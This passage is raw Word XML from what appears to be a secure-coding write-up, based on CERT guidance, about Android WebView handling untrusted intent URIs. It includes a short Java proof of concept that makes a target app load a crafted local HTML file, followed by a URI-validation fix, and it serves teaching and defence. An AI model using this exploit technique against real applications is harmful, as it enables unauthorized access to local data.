              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D24FC3">
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="494C4E"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve">Figure </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Emphasis"/>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="494C4E"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00D24FC3">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="494C4E"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="494C4E"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
            <w:r w:rsidRPr="00D24FC3">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="494C4E"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00343A3C">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="494C4E"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>Noncompliant Code Example</w:t>
            </w:r>
            <w:r w:rsidRPr="00D24FC3">
              <w:rPr>
                <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
                <w:color w:val="494C4E"/>
                <w:spacing w:val="3"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>. Retrieved from wiki.sei.cmu.edu. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C334D02" w14:textId="26C7D9D1" w:rsidR="00343A3C" w:rsidRPr="00F415AD" w:rsidRDefault="00343A3C" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D4885D6" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="450" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024329A1" w14:textId="0A854E0D" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t>e following code</w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343A3C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t xml:space="preserve">is an example of how the code from figure 2 can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t>exploited:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="21600" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="21600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F415AD" w:rsidRPr="00F415AD" w14:paraId="155FF0C8" w14:textId="77777777" w:rsidTr="00F415AD">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="225" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65A0B285"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 Malicious application prepares some crafted HTML file,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60ED7886"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 places it on a local storage, makes accessible from</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1135A637"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 other applications. The following code sends an</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52365748"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 intent to a target application (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>jp.vulnerable.android.app</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09BF540E"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 to make it access and process the malicious HTML file.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C0849F9"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 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="350A815E"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String pkg = "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>jp.vulnerable.android.app</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="6F11B78E"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 xml:space="preserve">String </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>cls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> = pkg + </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>".</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>DummyLauncherActivity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15BBBC92"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 xml:space="preserve">String </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> = "</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>file:///[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>crafted HTML file]";</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E3DFBCA" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">Intent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>intent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> = new</w:t>
            </w:r>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>Intent(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AF14A8E" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>intent.setClassName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">(pkg, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>cls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C5D8B7" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>intent.putExtra</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>("</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve">", </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7217C7FC" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>this.startActivity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F415AD">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>(intent);</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CA4E13B" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C614D3A" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="450" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="172B4D"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Compliant Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDC9E23" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="150" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F415AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
        </w:rPr>
        <w:t>Any URI received via an intent from outside a trust-boundary should be validated before rendering it with WebView. For example, the following code checks a received URI and rejects the "file:" scheme URI.  More generally, it allows only URIs that start with "http".  (Note that "https" starts with "http".)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AB6621" w14:textId="77777777" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="172B4D"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="21600" w:type="dxa"/>
        <w:tblCellSpacing w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="21600"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F415AD" w:rsidRPr="00F415AD" w14:paraId="61427AEF" w14:textId="77777777" w:rsidTr="00F415AD">
        <w:trPr>
          <w:tblCellSpacing w:w="0" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="21600" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="225" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71A1A4F7" w14:textId="5F75F211" w:rsidR="00F415AD" w:rsidRPr="00F415AD" w:rsidRDefault="00F415AD" w:rsidP="00F415AD">
            <w:pPr>
              <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
              <w:ind w:left="-225"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00324837">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD45556" wp14:editId="4EDA91F1">
                  <wp:extent cx="5943600" cy="337756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3377565"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="30E22843" w14:textId="6E0C062C" w:rsidR="00BB6B81" w:rsidRDefault="00343A3C" w:rsidP="00343A3C">
      <w:pPr>
        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D24FC3">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="494C4E"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
